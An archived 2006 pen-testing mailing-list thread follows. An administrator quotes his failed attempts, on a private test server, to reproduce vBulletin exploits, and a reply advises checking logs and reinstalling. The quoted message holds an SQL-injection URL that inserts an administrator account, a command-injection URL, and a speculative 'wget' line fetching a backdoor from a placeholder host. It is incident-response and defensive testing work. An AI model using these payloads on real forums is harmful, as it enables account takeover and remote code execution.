Re: testing vulnerable web application.
- From: "Steven" <steven@xxxxxxxxxxx>
- Date: Mon, 26 Jun 2006 13:21:36 -0400
Dave,
Not to point out something too obvious, but have you checked your web logs? If they are doing SQL injection or other business through the web interface it should all be in there. You should be able to just open up your logs and look for things that are out of the ordinary. Look for direct queries to your page or for possible file inclusion attacks. Next you might want to take a look at the server logs itself and see if anyone is logging in or logged in at strange times. Make sure your box is not completely compromised or possibly being fiddled with by an insider. You may want to consider completely wiping your VBulletin install and starting fresh with patches and all. Keep your database and all but double check it to make sure there really aren't accounts and what not that should not be there.
Good luck
Steven
----- Original Message ----- From: "Dave" <fla.tech.talk@xxxxxxxxx>
To: <pen-test@xxxxxxxxxxxxxxxxx>
Sent: Sunday, June 25, 2006 10:41 PM
Subject: testing vulnerable web application.
pen testers,
Our companies website hosts a forum program called vBulletin 3.0.3. A few recent incidents (i.e. threads vanishing, user accounts deleted) has us looking into how this is happening. Our manager wants to solve this problem 'in house' so the task was given to me and another employee to see if we can figure out how this is happening and stop it.
1) We have closely monitored all (co)admin and moderators activities and this has revealed nothing out of the ordinary.
2) We restored the DB content using a backup and within 2 days the threads and accounts in question were gone again.
3) We downloaded and installed a patch from vbulletin.com that was supposed to secure the application but this has not stopped the problem.
We assumed the attacker was using some sort of SQL injection to alter the DB records or possibly he can craft a SQL query in a way that will create an admin account to use to simply log in and alter the records and then delete his username...NO rogue admin accounts have ever been found.
1) We searched the bugtraq lists at securityfocus.com and packetstorm for known SQL vulns for vBulletin
2) We set up a test server to test our theories without damaging the actual DB or interrupting normal business. The options granted to our vbulletin DB user are SELECT,UPDATE,ALTER,INSERT and DELETE so we set up our test DB with the same permissions etc...
In our search for possible vulns we came across these links:
http://packetstormsecurity.nl/0509-exploits/20050917-vbulletin-3.0.8.txt
When we try to test these POC snippets we dont get results. Examples we have tried:
USING example : admincp/user.php?do=find&orderby=username&limitnumber=[SQL] we crafted a URL:
http://192.168.6.99:8080/vb-forums/admincp/user.php?do=find&orderby=username&limitnumber=[INSERT%20INTO%20user%20VALUES('12345',%20'6',%20'',%20'0',%20'admintest',%20'5f376e00eb11f00d0262636a5b699501',%20'2006-06-25',%20'nospam@xxxxxxxxxx',%20'0',%20'',%20'',%20'',%20'',%20'',%20'2',%20'Administrator',%20'0',%20'1151266933',%20'0',%20'1151272079',%20'1151274578',%20'1151267867',%20'1',%20'10',%20'1',%20'',%20'0',%20'0',%20'0',%20'2135',%20'',%20'0000-00-00',%20'-1',%20'1',%20'',%20'0',%20'0',%20'',%20'0',%20'0',%20'-1',%20'0',%20'0',%20'$Nu')]
The syntax for this SQL was obtained from the backup.sql file created by vBulletin. In theory this would create an account with following values:
userid = 12345
usergroupid = 6
username = admintest
password = 5f376e00eb11f00d0262636a5b699501 this = "password"
passworddate = 2006-06-25
email = nospam@xxxxxxxxxx
styleid = 0
usertitle = Administrator
reputation = 10
reputationlevelid = 1
options = 2135
salt = $Nu
Another example we tried:
URL of vuln listing: http://packetstormsecurity.nl/0502-exploits/vbulletin-3.0.4-2.txt
Reading this we wondered if the attacker was possibly running a command on the server (such as wget http://foobar.com/backdoor.script) then using this backdoor script he is able to view source code of DB related scripts to obtain info for DB access etc...
We have tried using both the POC code and self crafted URL's like:
http://192.168.6.99:8080/vb-forums/forumdisplay.php?GLOBALS[]=1&f=1&comma=".`echo _START_`.`'touch test.txt'`.`echo _END_`."
> then
http://192.168.6.99:8080/vb-forums/test.txt
> 404 error file not found
This is just a small list of unfruitful examples gathered during a rather exhaustive effort to exploit this application. To date we were not able to successfully exploit the vBulletin application using any of the available POC code snippets. We were hoping that someone out there who is more proficient at this line of work could shed some light on our situation and possibly point us in the right direction.
Thanks in advance for any suggestions.
Dave
------------------------------------------------------------------------------
This List Sponsored by: Cenzic
Concerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request@xxxxxxxxxx for details.
------------------------------------------------------------------------------
------------------------------------------------------------------------------
This List Sponsored by: Cenzic
Concerned about Web Application Security? Why not go with the #1 solution - Cenzic, the only one to win the Analyst's Choice Award from eWeek. As attacks through web applications continue to rise, you need to proactively protect your applications from hackers. Cenzic has the most comprehensive solutions to meet your application security penetration testing and vulnerability management needs. You have an option to go with a managed service (Cenzic ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download FREE whitepaper on how a managed service can help you: http://www.cenzic.com/news_events/wpappsec.php And, now for a limited time we can do a FREE audit for you to confirm your results from other product. Contact us at request@xxxxxxxxxx for details.
------------------------------------------------------------------------------
- References:
- testing vulnerable web application.
- From: Dave
- testing vulnerable web application.
- Prev by Date: RE: passw0rd trial limit
- Next by Date: books
- Previous by thread: Re: testing vulnerable web application.
- Next by thread: Re: testing vulnerable web application.
- Index(es):
Relevant Pages
|
